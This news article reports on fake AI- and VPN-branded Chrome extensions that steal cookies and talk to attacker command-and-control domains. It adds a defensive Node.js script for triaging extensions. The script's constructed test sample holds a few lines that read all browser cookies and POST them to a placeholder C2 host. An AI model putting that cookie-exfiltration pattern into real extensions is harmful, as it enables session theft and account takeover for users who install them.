Malicious Chrome extensions pose as AI tools to trick users into installing malware

Published 21 May 2025

More than 100 deceptive Chrome extensions with dual functionality, which work roughly as advertised while also running hidden malicious code, have been compromising users since February 2024, stealing credentials and manipulating web traffic behind a legitimate-looking front.

Security researchers report that a well-resourced threat actor has built fake websites impersonating popular services such as DeepSeek AI, FortiVPN, and DeBank to lure users into installing the corresponding malicious Chrome extensions. The extensions deliver some of the advertised functionality while quietly executing code that can read cookies and saved credentials and inject advertisements into pages.

“The actor creates websites that masquerade as legitimate services to direct users to install corresponding malicious extensions,” according to a report from DomainTools Intelligence released this month.

The extensions request far more permission than their advertised function needs, typically the right to read and change data on every website the user visits. They also use technical tricks to work around Chrome's built-in protections.

“Extensions impersonating DeepSeek redirected users providing low ratings to a private feedback form while sending high ratings to the official Chrome Web Store review page,” the DomainTools report noted. Funnelling complaints away from the public listing keeps the visible rating high and the extension looking trustworthy to the next victim.

Google has removed several of the extensions from the Chrome Web Store, but others were still available when the report was published. Because the malicious behaviour sits behind features that genuinely work, the extensions are hard to distinguish from benign ones during store review, and detection lags distribution.

The researchers identified a common pattern in how the extensions operate. Once installed, they beacon to attacker-controlled domains with names like “api.sprocketwhirl.top”. These connections serve as a command-and-control channel: the operator sends instructions to the extension and receives stolen data back over it.

The malicious logic typically lives in the extension's background script, in files named “background.js” or “background.iife.js”. These scripts run with the extension's full permissions and contain routines that read browser cookies; a stolen session cookie can be replayed to take over the user's account on the site it belongs to, so a single extension can compromise accounts across many websites.

The attackers promote the lookalike sites, and through them the fake extensions, on Facebook and other Meta platforms. Because the copies partially work as promised, users have little reason to suspect them.

To stay safe, check the permissions an extension requests before installing it and weigh them against what it claims to do; a tool with a narrow purpose has no reason to ask for access to every site. Prefer extensions from developers with an established track record, and periodically review what is installed at chrome://extensions, removing anything you no longer recognise or need. Any extension that asks for access to all websites or to browser data such as cookies deserves extra scrutiny.
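As an added example, not code from the article or from the DomainTools report, the following Node.js script performs the kind of check the permissions paragraph and the background-script description above call for: it reads an unpacked extension's manifest.json and the background script it declares, then flags broad host access, sensitive permissions, cookie reads through chrome.cookies, and outbound hosts the manifest never explicitly declares. The eval/new Function check is an extra heuristic of mine rather than something the report describes; the two sample extensions are constructed for the example, and api.example.invalid is a placeholder, not an indicator from the report.

```javascript
// Added example: static triage of an unpacked Chrome extension. Not code from
// DomainTools or from any extension the article describes. Sample data below
// is constructed; "api.example.invalid" is a placeholder C2 host.

const BROAD_HOST_PATTERNS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);
const SENSITIVE_PERMISSIONS = new Set(['cookies', 'webRequest', 'webRequestBlocking',
  'declarativeNetRequest', 'scripting', 'tabs', 'history', 'debugger', 'proxy']);

// Host match patterns from both the MV2 ("permissions") and MV3 ("host_permissions") keys.
function hostPatterns(manifest) {
  return [...(manifest.permissions || []), ...(manifest.host_permissions || [])]
    .filter((p) => p === '<all_urls>' || p.includes('://'));
}

// Background script file names: MV3 declares one service worker, MV2 a list of scripts.
function backgroundScripts(manifest) {
  const bg = manifest.background || {};
  return bg.service_worker ? [bg.service_worker] : (bg.scripts || []);
}

// Hostnames appearing in http(s)/ws(s) URL literals inside a script.
function outboundHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/(?:https?|wss?):\/\/([a-z0-9.-]+\.[a-z]{2,})/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

// True when a specific (non-wildcard) pattern covers the host; "*.example.com"
// covers example.com and its subdomains, as in Chrome match patterns.
function hostExplicitlyDeclared(host, patterns) {
  return patterns.filter((p) => !BROAD_HOST_PATTERNS.has(p)).some((p) => {
    const m = /^[^:]+:\/\/([^/]+)/.exec(p);
    if (!m) return false;
    const pat = m[1].toLowerCase();
    return pat.startsWith('*.') ? host === pat.slice(2) || host.endsWith(pat.slice(1)) : host === pat;
  });
}

// files: { 'manifest.json': string, '<background script>': string, ... }
// Returns human-readable findings; an empty list means nothing was flagged.
function triage(files) {
  const manifest = JSON.parse(files['manifest.json']);
  const patterns = hostPatterns(manifest);
  const findings = [];
  const broad = patterns.filter((p) => BROAD_HOST_PATTERNS.has(p));
  if (broad.length) findings.push(`manifest: access to every site via ${broad.join(', ')}`);
  for (const p of manifest.permissions || []) {
    if (SENSITIVE_PERMISSIONS.has(p)) findings.push(`manifest: sensitive permission "${p}"`);
  }
  for (const name of backgroundScripts(manifest)) {
    const src = files[name];
    if (src === undefined) { findings.push(`${name}: declared in manifest but not present`); continue; }
    if (/chrome\.cookies\.(getAll|get)\s*\(/.test(src)) findings.push(`${name}: reads browser cookies via chrome.cookies`);
    if (/\b(eval|new Function)\s*\(/.test(src)) findings.push(`${name}: evaluates dynamically built code`);
    for (const host of outboundHosts(src)) {
      const scope = hostExplicitlyDeclared(host, patterns) ? '' : ' (not explicitly declared in host patterns)';
      findings.push(`${name}: contacts ${host}${scope}`);
    }
  }
  return findings;
}

// Loads an unpacked extension directory (e.g. <profile>/Extensions/<id>/<version>/)
// into the map triage() expects: the manifest plus its declared background scripts.
function loadUnpacked(dir) {
  const fs = require('node:fs');
  const path = require('node:path');
  const files = { 'manifest.json': fs.readFileSync(path.join(dir, 'manifest.json'), 'utf8') };
  for (const name of backgroundScripts(JSON.parse(files['manifest.json']))) {
    const p = path.join(dir, name);
    if (fs.existsSync(p)) files[name] = fs.readFileSync(p, 'utf8');
  }
  return files;
}

// Constructed sample mirroring the pattern the article describes (not a real extension).
const MALICIOUS_SAMPLE = {
  'manifest.json': JSON.stringify({ manifest_version: 3, name: 'DeepSeek AI Assistant (constructed)',
    version: '1.0.0', permissions: ['cookies', 'storage', 'scripting'], host_permissions: ['<all_urls>'],
    background: { service_worker: 'background.iife.js' } }),
  'background.iife.js': [
    'const C2 = "https://api.example.invalid/cmd"; // placeholder, not a real domain',
    'chrome.cookies.getAll({}, (cookies) => {',
    '  fetch(C2, { method: "POST", body: JSON.stringify(cookies) });',
    '});'].join('\n'),
};

// Constructed benign sample: minimal permissions, no network use, no cookie access.
const BENIGN_SAMPLE = {
  'manifest.json': JSON.stringify({ manifest_version: 3, name: 'Word counter (constructed)',
    version: '0.1.0', permissions: ['storage'], background: { service_worker: 'background.js' } }),
  'background.js': 'chrome.runtime.onInstalled.addListener(() => chrome.storage.local.set({ at: Date.now() }));',
};

if (typeof require !== 'undefined' && require.main === module) {
  const dir = process.argv[2];
  console.log(triage(dir ? loadUnpacked(dir) : MALICIOUS_SAMPLE).join('\n') || 'nothing flagged');
}
```

Run it with no argument to triage the constructed sample, or pass the path of an unpacked extension directory; Chrome keeps installed extensions under the profile's Extensions/<id>/<version>/ folder. Heuristics like these are a triage aid, not a verdict: a background script that fetches its real payload from a remote host at runtime may show nothing here beyond a single URL, so treat any external host combined with cookies access as a reason to read the code rather than as a clean result.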

Security researchers continue to track these extensions, but the gap between distribution and detection means users cannot rely on the store alone and must remain vigilant when installing browser add-ons.